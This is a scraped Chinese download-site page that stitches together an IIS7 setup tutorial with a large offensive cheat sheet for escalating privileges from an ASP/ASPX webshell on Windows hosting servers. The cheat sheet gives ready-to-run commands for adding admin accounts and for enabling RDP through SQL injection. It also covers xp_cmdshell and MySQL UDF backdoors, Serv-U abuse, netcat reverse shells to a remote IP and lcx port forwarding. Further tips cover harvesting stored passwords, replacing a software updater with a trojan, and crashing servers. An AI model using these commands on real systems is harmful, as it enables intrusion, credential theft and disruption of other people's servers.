精华内容
下载资源
问答
  • 第一步,进入控制面板,点击程序图标 第二步,点击打开或关闭Windows功能 第三步,勾选Internet信息服务全部功能,或...第六步,点击ASP,将启用父路径设为True 第七步,点击默认文档,根据需要添加

    第一步,进入控制面板,点击程序图标

    image

    第二步,点击打开或关闭Windows功能

    image

    第三步,勾选Internet信息服务全部功能,或根据需要,点击确定,安装

     image

    第四步,进入控制面板,点击管理工具

    image

    第五步,点击Internet 信息服务(IIS)管理器

    image

     

    第六步,点击ASP,将启用父路径设为True

    image

    image

    第七步,点击默认文档,根据需要添加

    image

    第八步,失效,不需要设置

    第九步,点击默认网站,然后点击右边的基本设置,选择自己网站所在目录

    image

    image

    第十步,进入C:\Windows\ServiceProfiles\NetworkService\AppData\Local\,设置Temp文件夹的安全属性。右键点击属性—安全—编辑—添加image

    image

    image

    image

    第十一步,点击立刻查找,然后点击Authenticated Users—确定—添加—确定

    image

    image

    其他问题

    IIS7错误:服务器配置为将传递身份验证和内置帐户一起使用,以访问指定的物理路径...

    IIS7配置完后,总是提示HTTP500内部服务器错误,启用调试属性显示详细错误信息后,发现错误提示如下:
    错误摘要
    HTTP 错误 500.19 - Internal Server Errorweb.config 文件的 system.webServer/httpErrors 节中不允许绝对物理路径“C:\inetpub\custerr”。请改用相对路径。点击IIS管理器右边的“基本设置”,然后单击“测试连接”,发现有“授权”错误提示,详细信息提示为:
    服务器配置为将传递身份验证和内置帐户一起使用,以访问指定的物理路径。但是,IIS 管理器无法验证此内置帐户是否有访问权。请确保应用程序池标识具有该物理路径的读取访问权。如果此服务器加入到域中,并且应用程序池标识是 NetworkService 或 LocalSystem,则验证<domain>\<computer_name>$ 具有该物理路径的读取访问权,然后重新测试这些设置。

    image

    图1 IIS7授权错误提示

    原因与解决方法:
    通过反复测试后发现,这里是物理路径读取访问权限的问题,我们只需要修改“路径凭据”的验证方式,改为“特定用户”并将特定用户设为管理员的账号即可。比如输入账号为:administrator,密码为该账号的登录密码。如果该账号没有设置密码,这里是确定不了的,所以你可以去控制面板给该账号设置一个密码。具体操作如图2所示。

    image

    图2 更改IIS7“连接凭据”为特定管理员账号

    (提示:系统有密码时,有的人不喜欢每次打开电脑都需要登录,这个问题你只需要使用一个微软提供的自动登录小工具即可轻松解决。该小工具为Autologon.exe,具体介绍及下载可参考这里:windows系统自动登录小工具Autologon: http://www.zhiwenweb.cn/article.asp?id=1242
    如此简单的设置完后,你就发现问题得到解决了。如图3所示。

    image

    图3 iis7授权错误得到解决

    设置应用池

    打开当前网站所指定的应用池,将"托管管道模式"设置为"经典"

    2012年02月14日追记

    1)
    使用4.0框架开发的网站,在执行完上述操作后,可能会出现以下错误

    Description of HRESULT: The page you are requesting cannot be served because of the ISAPI and CGI Restriction list settings on the Web server.

    解决方法,进入iis 点击根目录(最最上面的server节点,不是某个网站的根节点),双击打开ISAPI and CGI Restrictions.
    将被禁止的4.0选项打开即可
    2)远程连接无效的问题
    防火墙端口没有开放导致无法远程访问
    在控制面板中,打开防火墙,高级,受信规则 ,添加规则,增加你网站的端口号即可。具体详细的规则设置等,就看需求了,这里就不多说了。

     

    转自:http://www.cnblogs.com/naniannayue/archive/2012/11/16/2772750.html 

    展开全文
  • 今天我就把我用ACCESS参数化查询的一些方法和经验和大家分享 希望对大家有所启发,有写的不对的地方希望高手们多多指教 ASP.NET 用OleDbCommand的new OleDbParameter创建参数货查询 ASP用Command的CreateParameter...
  • 代码如下: /// <summary> /// 返回随机数 /// </summary> /// ”VcodeNum”></param> /// <returns></...//由于字符串很短,就不用StringBuilder了 int temp = -1;//记录上次随机数值,尽量避免生产几个一样的随机
  • 如果是.NET,还必须给ASP.NET用户配置除完全控制以外的权限! 一般情况下,这样就OK了,服务器上的一般网站都可以正常运行了!但现在我发现:C/WINDOWS/TEMP临时文件夹的权限分配对网站能否成功运行也有影响! 但前几天遇

     做网站与搞安全一般都离不开权限分配,网站权限一般都直接设置站点所在的虚拟目录的,也就是在虚拟目录的安全里添加internet来宾账户,并分配除完全控制外的所有权限;如果是.NET,还必须给ASP.NET用户配置除完全控制以外的权限! 
    一般情况下,这样就OK了,服务器上的一般网站都可以正常运行了!但现在我发现:C/WINDOWS/TEMP临时文件夹的权限分配对网站能否成功运行也有影响! 
    但前几天遇到2个情况: 
    一、ASP站点: 
    做版聚网站,稻草给的源代码,我过来测试时候,怎么都连不上数据库;我以为数据库连接代码出错,于是一点一点的测试,结果怎么都不行,运行到最后,还是没发现错误!代码如下: 
    <% 
    db="inc/xxx.asp" 
    connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(""&db&"") 
    On Error Resume Next 
    Set conn = Server.CreateObject("ADODB.Connection") 
    Conn.ConnectionTimeout = 10 
    Conn.Open connstr 
    If Conn.Errors.Count <> 0 Then 
    Conn.Close 
    Set Conn = Nothing 
    Response.Write "<font size=2 color=red>数据库连接出错,请检查连接字串。</font>" 
    Response.End 
    End If 
    %> 
    可是总是显示:数据库连接出错,请检查连接字串.而我尝试了2个多小时,没发现任何错误!后来我想起以前因为temp的权限没给导致后台进不去的,于是我尝试给everyone的读写属性!于是一下子OK了~ 
    二、ASP.NET站点: 
    做毕业设计,突然出现如下的错误: 
    CS0016:未能写入输出文件"c:/WINDOWS/xxx目录/xxx.dll"--"拒绝访问." 
    引用 
    Compiler Error Message: CS0016: Could not write to output file 'c:/WINDOWS/Microsoft.NET/Framework/v2.0.50727/Temporary ASP.NET Files/root/80940643/9a3d5a0a/App_Web_index.aspx.cdcab7d2.p7p862zk.dll' -- '拒绝访问。 ' 
    很郁闷的检查错误,检查web.config文件,感觉不会出问题啊!后来在CSDN上看到篇文章,说解决方法就是:给Windows目录下的临时文件夹Temp的安全选项卡中加入NetWork Service用户并赋予全权. 
    寒,一试,果然搞定! 
    总之,temp临时目录的权限真的比较重要,于是写在blog里记下来,如果出现莫名其妙的错误,记得尝试给temp文件夹点权限!

    展开全文
  • 渗透之——ASP Web提权

    千次阅读 2018-12-31 17:50:30
    【 web提权 】 ...1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上...

    转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85475585

    【 web提权 】

    1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user

    2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。

    3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都可以。

    4.cmd命令:systeminfo,看看有没有KB952004、KB956572、KB970483这三个补丁,如果没有,第一个是pr提权,第二个是巴西烤肉提权,第三个是iis6.0提权。

    6.c:\windows\temp\cookies\  这个目录

    7.找sa密码或是root密码,直接利用大马的文件搜索功能直接搜索,超方便!

    8.cmd执行exp没回显的解决方法:com路径那里输入exp路径C:\RECYCLER\pr.exe,命令那里清空(包括/c )输入”net user jianmei daxia /add”

    9.增加用户并提升为管理员权限之后,如果连接不上3389,上传rootkit.asp脚本,访问会提示登录,用提权成功的账号密码登录进去就可以拥有管理员权限了。

    10.有时变态监控不让添加用户,可以尝试抓管理哈希值,上传“PwDump7 破解当前管理密码(hash值)”,俩个都上传,执行PwDump7.exe就可以了,之后到网站去解密即可。

    11.有时增加不上用户,有可能是密码过于简单或是过于复杂,还有就是杀软的拦截,命令 tasklist 查看进程

    12.其实星外提权只要一个可执行的文件即可,先运行一遍cmd,之后把星外ee.exe命名为log.csv 就可以执行了。

    13.用wt.asp扫出来的目录,其中红色的文件可以替换成exp,执行命令时cmd那里输入替换的文件路径,下面清空双引号加增加用户的命令。

    14.提权很无奈的时候,可以试试TV远控,通杀内外网,穿透防火墙,很强大的。

    15.当可读可写目录存在空格的时候,会出现这样的情况:’C:\Documents’ 不是内部或外部命令,也不是可运行的程序 或批处理文件。解决办法是利用菜刀的交互shell切换到exp路径,如:Cd C:\Documents and Settings\All Users\Application Data\Microsoft 目录
    然后再执行exp或者cmd,就不会存在上面的情况了,aspshell一般是无法跳转目录的~

    16.有时候可以添加用户,但是添加不到管理组,有可能是administrators改名了,net user administrator 看下本地组成员,*administrators

    17.进入服务器,可以继续内网渗透  这个时候可以尝试打开路由器 默认帐号密码 admin  admin

    18.有的cmd执行很变态,asp马里,cmd路径填上面,下面填:”"c:\xxx\exp.exe “whoami”  记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那里,下面不变。

    19.一般增加不上用户,或是想添加增加用户的vbs,bat,远控小马到服务器的启动项里,用“直接使服务器蓝屏重启的东东”这个工具可以实现,

    20.执行PwDump7.exe抓哈希值的时候,建议重定向结果到保存为1.txt /c c:\windows\temp\cookies\PwDump7.exe >1.txt

    21.菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setp c:\windows\temp\cmd.exe 设置终端路径为:c:\windows\temp\cmd.exe

    22.当不支持aspx,或是支持但跨不了目录的时候,可以上传一个读iis的vps,执行命令列出所有网站目录,找到主站的目录就可以跨过去了。
    上传cscript.exe到可执行目录,接着上传iispwd.vbs到网站根目录,cmd命令/c “c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs

    23.如何辨别服务器是不是内网? 192.168.x.x    172.16.x.x    10.x.x.x

    (( dos命令大全 ))

    查看版本:ver

    查看权限:whoami

    查看配置:systeminfo

    查看用户:net user

    查看进程:tasklist

    查看正在运行的服务:tasklist /svc

    查看开放的所有端口:netstat -ano

    查询管理用户名:query user

    查看搭建环境:ftp 127.0.0.1

    查看指定服务的路径:sc qc Mysql

    添加一个用户:net user jianmei daxia.asd /add

    提升到管理权限:net localgroup administrators jianmei /add

    添加用户并提升权限:net user jianmei daxia.asd /add & net localgroup administrators jianmei /add

    查看制定用户信息:net user jianmei

    查看所有管理权限的用户:net localgroup administrators

    加入远程桌面用户组:net localgroup “Remote Desktop Users” jianmei /add

    突破最大连接数:mstsc /admin /v:127.0.0.1

    删除用户:net user jianmei /del

    删除管理员账户:net user administrator daxia.asd

    更改系统登陆密码:net password daxia.asd

    激活GUEST用户:net user guest /active:yes

    开启TELNET服务:net start telnet

    关闭麦咖啡:net stop “McAfee McShield”

    关闭防火墙:net stop sharedaccess

    查看当前目录的所有文件:dir c:\windows\

    查看制定文件的内容:type c:\windows\1.asp

    把cmd.exe复制到c:\windows的temp目录下并命名为cmd.txt:copy c:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt

    开3389端口的命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

    查看补丁:dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt

    (( SQL语句直接开启3389 ))

    3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections

    其中键值DenyTSConnections 直接控制着3389的开启和关闭,当该键值为0表示3389开启,1则表示关闭。

    而MSSQL的xp_regwrite的存储过程可以对注册进行修改,我们使用这点就可以简单的修改DenyTSConnections键值,从而控制3389的关闭和开启。

    开启3389的SQL语句:
    syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–

    关闭3389的SQL语句:
    syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,1;–

    (( 常见杀软 ))

    360tray.exe  360实时保护

    ZhuDongFangYu.exe  360主动防御

    KSafeTray.exe  金山卫士

    McAfee McShield.exe  麦咖啡

    SafeDogUpdateCenter.exe  服务器安全狗

    (( windows提权中敏感目录和敏感注册表的利用 ))

    敏感目录                                                  目录权限                            提权用途

    C:\Program Files\                                          默认用户组users对该目录拥有查看权         可以查看服务器安装的应用软件
    C:\Documents and Settings\All Users\「开始」菜单\程序          Everyone拥有查看权限                    存放快捷方式,可以下载文件,属性查看安装路径
    C:\Documents and Settings\All Users\Documents                  Everyone完全控制权限                    上传执行cmd及exp
    C:\windows\system32\inetsrv\                                  Everyone完全控制权限                    上传执行cmd及exp
    C:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini  默认用户组users拥有查看权限               安装mysql时会将root密码写入该文件
    C:\windows\system32\                                          默认用户组users拥有查看权限            Shift后门一般是在该文件夹,可以下载后门破解密码
    C:\Documents and Settings\All Users\「开始」菜单\程序\启动  Everyone拥有查看权限                    可以尝试向该目录写入vbs或bat,服务器重启后运行。
    C:\RECYCLER\D:\RECYCLER\                                  Everyone完全控制权限                    回收站目录。常用于执行cmd及exp
    C:\Program Files\Microsoft SQL Server\                          默认用户组users对该目录拥有查看权限    收集mssql相关信息,有时候该目录也存在可执行权限
    C:\Program Files\MySQL\                                          默认用户组users对该目录拥有查看权限    找到MYSQL目录中user.MYD里的root密码
    C:\oraclexe\                                                  默认用户组users对该目录拥有查看权限    可以尝试利用Oracle的默认账户提权
    C:\WINDOWS\system32\config                                  默认用户组users对该目录拥有查看权限       尝试下载sam文件进行破解提权
    C:\Program Files\Geme6 FTP Server\Remote Admin\Remote.ini  默认用户组users对该目录拥有查看权限       Remote.ini文件中存放着G6FTP的密码
    c:\Program Files\RhinoSoft.com\Serv-U\c:\Program Files\Serv-U\  默认用户组users对该目录拥有查看权限    ServUDaemon.ini 中存储了虚拟主机网站路径和密码
    c:\windows\system32\inetsrv\MetaBase.xml                  默认用户组users对该目录拥有查看权限    IIS配置文件
    C:tomcat5.0\conf\resin.conf                                  默认用户组users对该目录拥有查看权限    Tomat存放密码的位置
    C:\ZKEYS\Setup.ini                                          默认用户组users对该目录拥有查看权限    ZKEYS虚拟主机存放密码的位置

    (( 提权中的敏感注册表位置 ))

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib\Tcp           Mssql端口
    HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server DenyTSConnections                         远程终端 值为0 即为开启
    HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\                                                           mssql的注册表位置
    HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\                                                   华众主机注册表配置位置
    HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\                                   serv-u的用户及密码(su加密)位置
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\ WinStations\RDP-Tcp           在该注册表位置PortNumber的值即位3389端口值
    HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers                                           mysql管理工具Navicat的注册表位置,提权运用请谷歌
    HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters                                           Radmin的配置文件,提权中常将其导出进行进行覆盖提权
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\             IIS注册表全版本泄漏用户路径和FTP用户名漏洞
    HKEY_LOCAL_MACHINE\software\hzhost\config\Settings\mastersvrpass                           华众主机在注册表中保存的mssql、mysql等密码
    HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11                                   星外主机mssql的sa账号密码,双MD5加密
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots\ControlSet002  星外ftp的注册表位置,当然也包括ControlSet001、ControlSet003

    (( wscript.shell的删除和恢复 ))

    载wscript.shell对象,在cmd下或直接运行:regsvr32 /u %windir%\system32\WSHom.Ocx

    卸载FSO对象,在cmd下或直接运行:regsvr32.exe /u %windir%\system32\scrrun.dll

    卸载stream对象,在cmd下或直接运行:regsvr32 /s /u “C:\ProgramFiles\CommonFiles\System\ado\msado15.dll”

    如果想恢复的话只需要去掉/U 即可重新再注册以上相关ASP组件,这样子就可以用了

    (( 如何找到准确的终端连接端口?))

    在aspx大马里,点击“系统信息”第三个就是目前的3389端口

    或是执行命令查看正在运行的服务:tasklist /svc

    找到:svchost.exe         1688  TermService

    记住1688这个ID值,

    查看开放的所有端口:netstat -ano

    找到1688这个ID值所对应的端口就是3389目前的端口

    (( iis6提权提示Can not find wmiprvse.exe的突破方法 ))

    突破方法一:

    在IIS环境下,如果权限做得不严格,我们在aspx大马里面是有权限直接结束wmiprvse.exe进程的,进程查看里面直接K掉

    在结束之后,它会再次运行,这时候的PID值的不一样的。这时候我们回来去运行exp,直接秒杀。

    突破方法二:

    虚拟主机,一般权限严格限制的,是没权限结束的,这时候我们可以考虑配合其他溢出工具让服务器强制重启,比如“直接使服务器蓝屏重启的东东”

    甚至可以暴力点,DDOS秒杀之,管理发现服务器不通了首先肯定是以为服务器死机,等他重启下服务器(哪怕是IIS重启下)同样秒杀之。

    (( 本地溢出提权 ))

    计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.

    缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.

    利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.

    想要执行cmd命令,就要wscript.shell组建支持,或是支持aspx脚本也行,因为aspx脚本能调用.net组件来执行cmd的命令.

    (( sa提权 ))

    扫描开放的端口,1433开了就可以找sa密码提权,用大马里的搜索文件功能,sa密码一般在conn.asp config.asp web.config 这三个文件

    也可以通过注册表找配置文件,看下支持aspx不,支持的话跨目录到别的站点上找,找到之后用aspshell自带的sql提权登录再执行命令创建用户即可。

    aspx马提权执行命令有点不一样,点击数据库管理–选MSSQL–server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB–输入帐号密码连接即可

    增加一个用户:exec master.dbo.xp_cmdshell ‘net user jianmei daxia.asd /add’;–
    提升为管理员:exec master.dbo.xp_cmdshell ‘net localgroup administrators jianmei /add’;–

    PS:如果增加不上,说明是xp_cmdshell组建没有,增加xp_cmdshell组建:Use master dbcc addextendedproc(‘xp_cmdshell’,'xplog70.dll’)

    (( root提权 ))

    利用mysql提权的前提就是,服务器安装了mysql,mysql的服务没有降权,是默认安装以系统权限继承的(system权限). 并且获得了root的账号密码

    如何判断一台windows服务器上的mysql有没有降权?
    cmd命令net user 如果存在 mysql mssql这样用户或者类似的.通常就是它的mssql mysql服务已经被降权运行了

    如何判断服务器上是否开启了mysql服务?
    开了3306端口,有的管理员会把默认端口改掉.另一个判断方法就是网站是否支持php,一般支持的话都是用mysql数据库的.

    如何查看root密码?
    在mysql的安装目录下找到user.myd这个文件,root就藏在里面,一般是40位cmd加密,一些php网站安装的时候用的是root用户,在conn.asp config.asp这些文件里。
    有时会显得很乱,这时就需要自己去组合,前17位在第一行可以找到,还有23位在第三行或是其他行,自己继续找。

    可以直接用php脚本里“mysql执行”,或是上传个UDF.php,如果网站不支持PHP,可以去旁一个php的站,也可以把UDF.php上传到别的phpshell上也可以。

    填入帐号密码之后,自然就是安装DLL了,点击“自动安装Mysql BackDoor” 显示导出跟创建函数成功后,紧接着执行增加用户的命令即可。

    注意:5.0版本以下(包括5.0的)默认c:\windows\系统目录就可以了,5.1版本以上的不能导出到系统目录下创建自定义函数,只能导出在mysql安装目录下的lib/plugin目录中

    例如:D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll

    如果密码看不见,或是组合不到40位,就本地安装一个mysql吧,
    1、停止mysql服务
    2、替换下载下来的3个文件(user.MYI user.MYD user.frm)
    3、cmd切换到bin目录下,进入mysql安全模式,cmd命令:mysqld-nt –skip-grant-tables
    4、重新打开一个cmd 切换到bin目录下,cmd命令:mysql -u root  版本不同有可能是:mysql -uroot -proot
    5、最后查询一下就出来了select user,password from mysql.user;

    (( serv-u提权 ))

    这个文件里包含serv-u的md5密码:C:\Program Files\RhinoSoft.com\Serv-U\\ServUDaemon.ini

    找到这个文件:ServUDaemon.ini 打开找到:LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2

    再拿md5密文去解密,再用现在的密码登陆提权即可。

    serv-u提权的前提是43958端口开了,且知道帐号密码!

    如果帐号密码默认,直接用shell里面的serv-u提权功能即可搞定,建议用aspx马、php马去提权,因为可以看回显。

    530说明密碼不是默认的,回显330说明成功,900说明密码是默认的……………..

    在程序里找个快捷方式,或是相关的文件进行下载到本地,再查看文件的属性,就可以找到serv-u的安装目录了。

    目录有修改权限之serv-u提权:

    找到serv-u的目录,再找到用户的配置文件ServUDaemon.ini,直接增加一个用户代码,保存!

    接着本地cmd命令:ftp 服务器ip

    回车,输入帐号密码再回车………………….

    接着先试试普通的cmd命令提权,不行的话就使用ftp提权的命令:

    Quote site exec net user jianmei daxia /add   增加一个用户

    Quote site exec net localgroup administrators jianmei /add   提升到管理员权限

    200 EXEC command successful (TID=33).   执行成功的回显信息

    Maintenance=System   权限类型多加一行指定新加帐号为系统管理员

    ReloadSettings=True   在修改ini文件后需加入此项,这时serv-u会自动刷新配置文件并生效

    (( 端口转发 ))

    什么情况下适合转发端口?

    1.服务器是内网,我们无法连接。
    2.服务器上有防火墙,阻断我们的连接。

    转发端口的前提,我们是外网或是有外网服务器。

    找个可读可写目录上传lcx.exe

    本地cmd命令:lcx.exe -listen 1988 4567  (监听本地1988端口并转发到4567端口)

    接着shell命令:/c c:\windows\temp\cookies\lcx.exe -slave 本机ip 1988 服务器ip 3389  (把服务器3389端口转发到本地4567端口)

    之后本地连接:127.0.0.1:4567  (如果不想加上:4567的话,本地执行命令的时候,把4567换成3389来执行就行了)

    以上是本机外网情况下操作,接着说下在外网服务器里如何操作:

    上传lxc.exe cmd.exe到服务器且同一目录,执行cmd.exe命令:lcx.exe -listen 1988 4567

    接着在aspxshell里点击端口映射,远程ip改为站点的ip,远端口程填1988,点击映射端口,接着在服务器里连接127.0.0.1:4567就可以了。

    (( nc反弹提权 ))

    当可以执行net user,但是不能建立用户时,就可以用NC反弹提权试下,特别是内网服务器,最好用NC反弹提权。

    不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口,那么这种方法也失效了….

    找个可读可写目录上传nc.exe cmd.exe

    -l  监听本地入栈信息

    -p  port打开本地端口

    -t  以telnet形式应答入栈请求

    -e  程序重定向

    本地cmd执行:nc -vv -l -p 52 进行反弹

    接着在shell里执行命令:c:\windows\temp\nc.exe -vv 服务器ip 999 -e c:\windows\temp\cmd.exe   最好是80或8080这样的端口,被防火墙拦截的几率小很多

    执行成功后本地cmd命令:cd/  (只是习惯而已)

    接着以telnet命令连接服务器:telnet 服务器ip 999

    回车出现已选定服务器的ip就说明成功了,接着权限比较大了,尝试建立用户!

    坏蛋:
    本地cmd执行:nc -vv -l -p 52 进行反弹
    c:\windows\temp\nc.exe -e c:\windows\temp\cmd.exe 服务器ip  52

    低调小飞:
    shell执行命令c:\windows\temp\nc.exe -l -p 110 -t -e c:\windows\temp\cmd.exe

    一般这样的格式执行成功率很小,不如直接在cmd那里输入:c:\windows\temp\nc.exe    命令这里输入:-vv 服务器ip 999 -e c:\windows\temp\cmd.exe

    这个技巧成功率比上面那个大多了,不单单是nc可以这样,pr这些提权exp也是可以的。

    (( 星外提权 ))

    如何知道是不是星外主机?

    第一:网站物理路径存在“freehost”
    第二:asp马里点击程序,存在“7i24虚拟主机管理平台”“星外主机”之类的文件夹

    默认帐号:freehostrunat
    默认密码:fa41328538d7be36e83ae91a78a1b16f!7

    freehostrunat这个用户是安装星外时自动建立的,已属于administrators管理组,而且密码不需要解密,直接登录服务器即可

    星外常写目录:

    C:\RECYCLER\
    C:\windows\temp\
    e:\recycler\
    f:\recycler\
    C:\php\PEAR\
    C:\WINDOWS\7i24.com\FreeHost
    C:\php\dev
    C:\System Volume Information
    C:\7i24.com\serverdoctor\log\
    C:\WINDOWS\Temp\
    c:\windows\hchiblis.ibl
    C:\7i24.com\iissafe\log\
    C:\7i24.com\LinkGate\log
    C:\Program Files\Thunder Network\Thunder7\
    C:\Program Files\Thunder Network\Thunder\
    C:\Program Files\Symantec AntiVirus\SAVRT\
    c:\windows\DriverPacks\C\AM2
    C:\Program Files\FlashFXP\
    c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\
    C:\Program Files\Zend\ZendOptimizer-3.3.0\
    C:\Program Files\Common Files\
    c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv
    c:\Program Files\360\360Safe\deepscan\Section\mutex.db
    c:\Program Files\Helicon\ISAPI_Rewrite3\error.log
    c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log
    c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf
    c:\Program Files\Common Files\Symantec Shared\Persist.bak
    c:\Program Files\Common Files\Symantec Shared\Validate.dat
    c:\Program Files\Common Files\Symantec Shared\Validate.dat
    C:\Program Files\Zend\ZendOptimizer-3.3.0\docs
    C:\Documents and Settings\All Users\DRM\
    C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection
    C:\Documents and Settings\All Users\Application Data\360safe\softmgr\
    C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll
    C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\

    ee提权法:

    找个可读可写目录上传ee.exe

    cmd命令:/c c:\windows\temp\cookies\ee.exe -i  (获取星外帐号的id值,例如回显:FreeHost ID:724)

    接着命令:/c c:\windows\temp\cookies\ee.exe -u 724  (获取星外的帐号密码)

    vbs提权法:

    找个可读可写目录上传cscript.exe iispwd.vbs

    cmd命令:/c “c:\windows\temp\cookies\cscript.exe” c:\windows\temp\cookies\iispwd.vbs

    意思是读取iis,这样一来,不但可以获取星外的帐号密码,还可以看到同服务器上的所有站点的目录。

    可行思路大全:

    经测试以下目录中的文件权限均为everyone,可以修改,可以上传同文件名替换,删除,最重要的是还可以执行:

    360杀毒db文件替换:
    c:\Program Files\360\360SD\deepscan\Section\mutex.db
    c:\Program Files\360\360Safe\deepscan\Section\mutex.db
    C:\Program Files\360\360Safe\AntiSection\mutex.db

    IISrewrite3 文件替换:
    C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log
    C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf
    C:\Program Files\Helicon\ISAPI_Rewrite3\error.log

    诺顿杀毒文件替换:
    c:\Program Files\Common Files\Symantec Shared\Persist.bak
    c:\Program Files\Common Files\Symantec Shared\Validate.dat
    c:\Program Files\Common Files\Symantec Shared\Persist.Dat

    一流过滤相关目录及文件:
    C:\7i24.com\iissafe\log\startandiischeck.txt
    C:\7i24.com\iissafe\log\scanlog.htm

    其他:
    Zend文件替换:C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll
    华盾文件替换:C:\WINDOWS\hchiblis.ibl
    Flash文件替换:C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx
    DU Meter流量统计信息日志文件替换:c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

    (( 360提权 ))

    找个可读可写目录上传360.exe

    cmd命令:/c c:\windows\temp\cookies\360.exe

    会提示3段英文:

    360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2

    You will get a Shift5 door!

    Shift5 Backdoor created!

    这是成功的征兆,接着连接服务器连按5下shift键,将弹出任务管理器,点击新建任务:explorer.exe 会出现桌面,接下来大家都会弄了……

    (( 搜狗提权 ))

    搜狗的目录默认是可读可写的,搜狗每隔一段时间就会自动升级,而升级的文件是pinyinup.exe

    我们只要把这个文件替换为自己的远控木马,或是添加账户的批处理,等搜狗升级的时候,就可以达成我们的目的了。

    (( 华众虚拟主机提权 ))

    就经验来说,一般溢出提权对虚拟主机是无果的,而且华众又没有星外那么明显的漏洞。

    所以华众提权关键之处就是搜集信息,主要注册表位置:

    HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\
    HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass     root密码
    HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss       sa 密码

    c:\windows\temp 下有hzhost主机留下的ftp登陆记录有用户名和密码

    以上信息配合hzhosts华众虚拟主机系统6.x 破解数据库密码工具使用

    百度搜索:hzhosts华众虚拟主机系统6.x 破解数据库密码工具

    (( N点虚拟主机 ))

    N点虚拟主机管理系统默认数据库地址为:\host_date\#host # date#.mdb

    rl直接输入不行 这里咱们替换下 #=# 空格=

    修改后的下载地址为/host_date/#host # date#196.mdb

    N点数据库下载之后找到sitehost表 FTPuser&FTPpass 值  FTPpass是N点加密数据然后用N点解密工具解密得到FTP密码

    N点默认安装路径C:\Program Files\NpointSoft\npointhost\web\
    D:\Program Files\NpointSoft\npointhost\web\
    默认权限可读。遇到对方所用虚拟主机是N点时候 可以考虑 读取该文件夹下载数据库

    N点解密工具代码

     

    展开全文
  • 首先,我们要保证获得记录集的方式支持bookmark属性,如在1、3插入一条有自动编号字段的记录后,获取该记录的bookmark属性值: temp = rs.bookmark 然后再: rs.bookmark = temp Response.write rs.Fields(“ID...
  • 今天把博客程序部署到一台阿里云Windows主机上,通过浏览器访问时出现下面的错误: 代码如下:创建 BlogConfigurationSettings 的配置节处理程序时出错: 拒绝访问...Access to the temp directory is denied. Identi
  • asp中FSO复制文件代码

